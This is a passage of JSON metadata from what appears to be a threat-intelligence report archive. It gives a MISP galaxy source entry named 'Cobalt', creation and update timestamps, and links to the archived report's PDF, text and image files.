			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434864,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2418c076b79a9fbd864deb6bd8f3e5889f577c0.pdf",
		"text": "https://archive.orkl.eu/d2418c076b79a9fbd864deb6bd8f3e5889f577c0.txt",
		"img": "https://archive.orkl.eu/d2418c076b79a9fbd864deb6bd8f3e5889f577c0.jpg"
	}
}